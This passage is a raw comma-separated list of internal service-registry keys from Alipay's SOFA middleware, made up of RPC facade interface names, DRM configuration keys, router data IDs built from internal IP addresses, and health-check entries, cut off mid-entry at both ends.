#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mychain.gov.common.facade.api.DataUsageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finslip.common.service.facade.notify.ManualInterveneCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:chargebackHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgengine.open.facade.java.AkgRealtimeEditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fingiftprod.common.service.facade.gift.GoldenGiftReceiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.76.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appxprod.common.service.facade.api.attribute.CatalogAttributeMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.AntqRouterFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilerelation.common.service.facade.tlou.TlouStandardBizQueryCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditkit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanrepayprod.common.service.facade.service.support.DiscountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.AmdpQueryFacade:1.0:fcprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.assistinvestigate.core.RequireUnFreezeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:HBase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.cust.CustResourceInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.208.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitydata:name=com.alipay.securitydata.common.service.client.gbase.impl.GeaBaseControlResourceImpl.querySwitchV2ConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findatacanal.common.service.manage.gogoal.GgDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ting.service.DemoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecbill.common.service.guaranty.CompensateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.buc.acl.api.service.TestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.comment.ServiceConfManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.vega-integration-kepler:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inscommunity.common.service.facade.ArticleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.172.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecashier.senior.service.facade.MobilecashierOrderFacade:1.0:fascore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcriskmng_process_risktask_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.xqlc.service.XqlcAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.test.TestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_172.20.240.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_F_ANTSCHEDULER_SERVERLESS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.clearingcenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.darwin:name=com.alipay.darwin.sdk.config.afs.secretAccessKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchmobile.biz.merchant.member.card.service.MrchMemberCardSwitchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.StockApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payboss.common.service.facade.onestop.deploy.OnestopDeployTrackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.249.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudlego:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rinsight.common.base.spi.RinsightRpcDataService:1.0:amlGraphPostServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:ebppprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_T_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.airbops:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@aggrbillinfo#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.instasset.ucm.core.InstQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqdataservice.common.service.facade.spider.YqSearchOrCrawlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpdcenter.facade.mng.auth.FpcAuthManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@dchainassetreg#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.assettrans.core.service.drm.AstcTransSettleDrmResourceInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.finauth.service.InstL2AccountApplyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricemng.common.service.facade.api.price.PriceTakeEffectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.imerchprod.module.merchant.facade.api.LabelManageService:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.160.177.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmobileappcommon_appConfig_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.voucherExpireCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onstopmng_VersionFacede@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.runtimedatasrcmng.common.service.facade.api.process.task.ProcessTaskQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.46.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findecision:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.core.service.antha.AnthaIMatchFacadeAdDataDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.development.common.facade.api.StreamJobApi:1.0:dpstreaming@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.trade.PaymentResultQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zcache.tbase.zdatacontextTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:bkpromoguard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.api.DocumentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.code.CodeAttackInspectFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkloandecision.service.facade.agds.QuerySwitchPdGroupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwmdas.common.service.facade.TrafficAnalysisBizTransferQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.CommonABTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:securityservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:pubbuservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.common.service.facade.auto2.AutoMonitorFacade:1.0:virtualprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.account.service.InstL2AccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_ILSPAY_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inscommunity.biz.mutual.service.ContractService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.GrayDRM.maxGrayTolerateMinute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:pcreditcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.biz.shared.partner.repository.InstSaleForbiddenRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fppolicygw.facade.oss.RiskaxelOssFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.bizcondition.BizConditionQueryService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageSendService:1.0:openmq@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pam.PamResourceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelspop.service.decision.opportunity.facade.OpportunityCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-promorpc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.bookmark.facade.BookMarkQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_EXCHANGECORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.appxprod.common.service.facade.api.servicelibrary.ServiceTempSyncDataMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.necbill.common.service.admin.OrgTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:insqa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.iexchangecore.common.service.facade.api.ScalePartnerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:riskmngCreateTaskProcessCallback@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.cptor.facade.search.CptorRoleSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.common.session.sessionConfigDrm.dataSeparate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialportal.web.ps.rpc.facade.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isasp.service.facade.psbp.InsuranceTypeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExRatePubRuleMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:chaintest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.SecumngNewsSecuritiesFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.task.VcpTicketQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:financemng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:wkprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accrmcore.common.service.facade.CRMLabelRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundDecisionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.config-security-false:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.userResolverTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.zdal.ldc.tair.addpLoadtestTairRz.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.biz.shared.feature.template.DetectItem:1.0:instantBroadNameDetectItem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.ReceiveIvrReceiptService:1.0:riskmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aclinkelib.common.service.facade.ComponentExecuteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.201.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finriskcore.common.facade.riskmng.RiskParamAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.minThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.airprod.common.service.facade.freezeunfreeze.AirPreparedUnfreezeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcp_easy_member_platform_withhold_apply@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.fundanalyze.fund.BankDailyBalanceFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiancore.common.service.InsEndorseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.mng.api.HotspotMiningMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.terminal.facade.TerminalUserService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onstopmng_userService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rule.common.base.service.ScriptValidateService:1.0:CUSTPERMA@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:signStandardContractNode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.sip.action.Action:1.0:identityTypeAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@darwin#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.imtmsvcprod.common.service.facade.dapply.OrderRefundServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.LocaleMsgManager:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ufe.meta.facade.service.TableInsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acticketcore.kernel.common.service.facade.QuestionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.echox.service.EchoxAopPlaybackService:1.0:cashier@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.HotPlateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.TransferprodCloseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.ipaySecurePasswordTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yebcore.common.facade.service.query.YebNonBankQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:instdispute-force-finish-callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MCARDCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmScriptorConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.facade.InnerDecisionService:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rcservicebus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.api.SecOpsChangeGrayService:1.0:secOps@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.176.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.accenter.service.facade.api.AccenterTaxSchemaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.shared.activity.drm.SceneActivityDrm.activityWhiteListConf,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.basementweb.SprintFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbitemprod.biz.shared.service.extend.CategoryPropertyExtends:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.tis.service.TisOsUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:workflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.api.AssetDirectTallyTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.workflow.common.service.facade.api.tsd.TsdAbilityFacade:1.0:ismonitor_manualMaintainFacadeService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_IRISKMNG_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.miniselfop.facade.api.miniplan.MiniPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:fporgassetcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.AttackFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.157.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instservice.common.service.facade.unionoperation.UniteProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscheck.service.facade.api.CheckInterventionStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.69.252#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.175.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finmobilemarket.common.service.facade.api.JCMSModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.workflowxTBaseCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.mma.facade.api.AnteyeFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-aggrbillinfo-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:testmeshapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_PRODTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ap.acquirefront.service.facade.api.AcquireBatchPayCreateAndPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.facade.ChannelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cmscore.common.service.facade.api.TeamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cashierdatacollector@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.12.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:publicDomain_securityservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.core.AppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.22.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.poscore.common.service.facade.express.manage.NOCInfoManagerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.service.drm.FPUASwitchConfigDrm.aipChangeDaySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.facade.risk.api.SecurityAsyncPreAnalyseService:1.0:uctfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.query.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcloudfunds.service.facade.depository.api.DepositoryAccountOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mctlib.biz.manager.service.smartprogram.MctSmartGearService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.assets.TagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:sffgroup-openbanksff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.userview.facade.FeatureLabelOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.23.148.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.classPathBlackListConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:demobff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.echox.service.EchoxMirrorProdDataWriter:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bketencop.facade.api.TaskMangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_IECPPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paymentmng.service.facade.paycore.PmtPtBizTypeCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsoc.service.facade.api.config.center.DeployRecordQueryService:1.0:offline_stable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdatacenter.common.service.facade.tag.match.EntityCrowdMatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-tttt1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.PublishContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.179.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilechat.common.service.facade.spi.bc.BcBusinessInfoFacade:1.0:offlineBcBusinessInfoFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitAbilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.253.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ipromofront.common.service.facade.service.tr.ExternalPromoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:bollywoodprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.OrderArQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.ssm.SeaViewRoomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ADMGR#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.cardmng.CardMngService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ZARCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.monitor.AlertTemplateManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.EnterpriseAccountLogQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.McardBearInterestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.